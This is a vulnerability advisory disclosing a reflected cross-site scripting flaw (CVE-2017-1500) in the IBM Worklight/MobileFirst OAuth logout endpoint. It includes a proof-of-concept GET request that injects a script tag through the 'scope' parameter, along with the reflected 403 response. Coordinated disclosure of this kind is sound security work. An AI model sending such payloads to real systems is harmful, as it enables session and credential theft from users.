IBM Worklight / MobileFirst Cross Site Scripting

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
a3/4 Reflected Cross-Site Scripting in IBM Worklight OAuth Server Web Api a1/2  
  
======== a3/4 Table of Contents a1/2 =========================================  
  
0. Overview  
1. Detailed Description  
2. Proof Of Concept  
3. Solution  
4. Disclosure Timeline  
5. Thanks & Acknowledgements  
6. References  
7. Credits  
8. Legal Notices  
  
======== a3/4 0. Overview a1/2 ===============================================  
  
Release Date:  
  
02 August 2017  
  
Revision:  
  
1.0  
  
Impact:  
  
Cross-Site Scripting (XSS) is a code injection attack that allows  
an attacker to execute malicious JavaScript code in a victim's  
browser, leading to steal sensitive information's and/or user  
credentials.  
  
Severity:  
  
Medium  
  
CVSS Score:  
  
5.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)  
  
CVE-ID:  
  
CVE-2017-1500  
  
Vendor:  
  
IBM  
  
Affected Products:  
  
IBM Worklight Enterprise Edition  
IBM MobileFirst Platform Foundation  
  
Affected Versions:  
  
6.1, 6.2, 6.3, 7.0, 7.1, 8.0  
  
Product Description:  
  
Worklight/MobileFirst is IBM's premier mobile application platform.  
On the device client app side, WorkLight/MobileFirst provide a  
framework to wrap around HTML5 web pages and make them into native  
applications.  
  
This approach is popularized by PhoneGap, and is widely used by  
developers (such as the GMail team at Google) to create cross  
platform mobile applications.  
  
With this approach, most of the user interface is presented in HTML5  
web pages, and the native framework provides access to device native  
functionalities (e.g., camera and GPS) in the form of JavaScript  
functions that can be called within the HTML5 web pages.   
  
On the server side, WorkLight/MobileFirst provides device management  
capabilities including a dashboard to view versions of the  
application installed on different devices.  
It can also manage sending PUSH notification to the devices.  
  
WorkLight/MobileFirst provides developer tools to create  
applications using their frameworks.  
  
======== a3/4 1. Detailed Description a1/2 ===================================  
  
During a Penetration Test to a mobile application it was found a  
Reflected Cross-Site Scripting (XSS) vulnerability.  
  
The mobile application was written by using an IBM security framework,  
called WorkLight (or better known MobileFirst).  
  
This vulnerability happens because the framework does not properly  
validate the untrusted input in a GET parameter, present in an  
authorization function exposed by RESTful Web Api.  
  
In detail the logout functionality return a HTTP 403 Forbidden  
if the value of the "scope" parameter is not defined in the  
"authenticationConfig.xml" and reflect it without a proper  
validation in the response body.  
  
To exploit the vulnerability simply append the payload to the  
original value present in the GET parameter "scope".  
  
======== a3/4 2. Proof Of Concept a1/2 =======================================  
  
HTTP Request  
  
[[  
GET /authorization/v1/authorization?client_id=[CLIENT_ID]  
&scope=-WSAuthRealm%22%3E%3Cscript%3Ealert(1)%3C/script%3E  
&isAjaxRequest=true&x=0.768018694  
Host: [UNDISCLOSED]  
User-Agent: [USER_AGENT]  
Accept: text/html  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: JSESSIONID=[SESSION_ID]  
Connection: close  
]]  
  
HTTP Response  
  
[[  
HTTP/1.1 403 Forbidden  
Content-Type: text/html  
Connection: Close  
Date: Mon, 29 Aug 2016 16:13:37 GMT  
Strict-Transport- Security: max-age=157680000  
X-Expires- Orig: None  
Cache-Control: max-age=0, must-revalidate, private  
Content-Length: 109  
  
Logout failed: The realm 'WSAuthRealm"><script>alert(1)</script>'  
is not defined in authenticationConfig.xml.  
]]  
  
======== a3/4 3. Solution a1/2 ===============================================  
  
Refer to IBM Security Bulletin C1000316 for patch, upgrade or  
suggested workaround information.  
  
See "References" for more details.  
  
======== a3/4 4. Disclosure Timeline a1/2 ====================================  
  
29/08/2016 : Discovery of the vulnerability  
07/09/2016 : Vulnerability submitted to vendor  
09/01/2017 : Request status update to the vendor, fix in progress  
27/04/2017 : Request status update to the vendor, fix in progress  
01/06/2017 : Request status update to the vendor, fix in progress  
11/07/2017 : Request status update to the vendor, fix in progress  
21/07/2017 : Vendor release the advisory and solution  
21/07/2017 : Request CVE-ID assignment   
27/07/2017 : Vendor update the advisory with CVE-ID  
01/08/2017 : Public disclosure  
  
======== a3/4 5. Thanks & Acknowledgements a1/2 ==============================  
  
IBM PSIRT - Product Security Incident Response Team  
Emaze Networks S.p.A. - Assessment Team  
  
======== a3/4 6. References a1/2 =============================================  
  
(1) http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-1500  
(2) https://www-01.ibm.com/support/docview.wss?uid=swg2C1000316  
(3) https://exchange.xforce.ibmcloud.com/vulnerabilities/129404  
(4) http://cwe.mitre.org/data/definitions/79.html  
(5) https://www.ibm.com/blogs/psirt/  
(6) https://www.emaze.net/security-assessment/  
  
======== a3/4 7. Credits a1/2 ================================================  
  
This vulnerability was discovered and reported by:  
  
Gabriele 'matrix' Gristina (gabriele DOT gristina AT gmail DOT com)  
  
Contacts:  
  
https://www.linkedin.com/in/gabrielegristina  
https://twitter.com/gm4tr1x  
https://github.com/matrix/  
  
======== a3/4 8. Legal Notices a1/2 ==========================================  
  
Copyright (c) 2017 Gabriele 'matrix' Gristina  
  
Permission is granted for the redistribution of this alert  
electronically. It may not be edited in any way without mine express  
written consent. If you wish to reprint the whole or any  
part of this alert in any other medium other than electronically,  
please email me for permission.  
  
Disclaimer: The information in the advisory is believed to be accurate  
at the time of publishing based on currently available information.  
Use of the information constitutes acceptance for use in an AS IS  
condition.  
There are no warranties with regard to this information. Neither the  
author nor the publisher accepts any liability for any direct,  
indirect, or consequential loss or damage arising from use of,  
or reliance on,this information.  
  
-----BEGIN PGP SIGNATURE-----  
  
iQIcBAEBCgAGBQJZgZIbAAoJEI8SLzp6plg3i2IQAL81C0hxf6j8RMQ2fp6GMItZ  
GhnbRucij4O0sxbhUk1Yitmd2GFPotmZYCWmhPPPUYITuQP9RNX+hIVzwEL0jsQ0  
QrnovRFpZOjdkqAnC7j8+frpitDP3RE4IdcuwBuEiKPGzSY8FPwxgFYLBdAmliT3  
WbRWukIDqvMHmHIp9peqb/RNFLdnH6+YNWz+d7UDcdC5I1iLdiQkmSSmB/Us/hep  
er1oOtKlLZcmEYZ9GtadjAqqQRs47zBy5HNzMWiTXbUVKPMVp1WObqJu1bjHe8bl  
YPamcDBk67uDa2CYaE/26amVXYYuOTyH0dm6nYbLmVsz/eyWXjP9bLlqL3NPq3QJ  
tDuUWcA/XumZF5yiGNeinhkzN55+2cW5de80eZ43BV7vugLaHo+m24gU02eYhQos  
8hSX90R5he9a2QsTuzt8brTaclc4rfBOdPD1RYfGgadkqQIYH7c7Qbc6eypWz9S0  
CgUWODJX6dKvhKy3iAuYcdQLYJECWGwQJGN4SyULoKTK021zgaXMSlQzC/gx+gP8  
EKIXQH7mkBLS+rvGNJfZ4dmZzQjAETUuQrMphPNd1sCcEoo83/kTJPx9J1Rpwa6F  
R8+t+KjWL1SdIlb6m4c+Bfhwu/zcEJW/U7LI+UPmDHey7MiGBlYObp0W8N+P0aa7  
hKSN1qjfcTZCvp7X/xtV  
=Eubs  
-----END PGP SIGNATURE-----  
`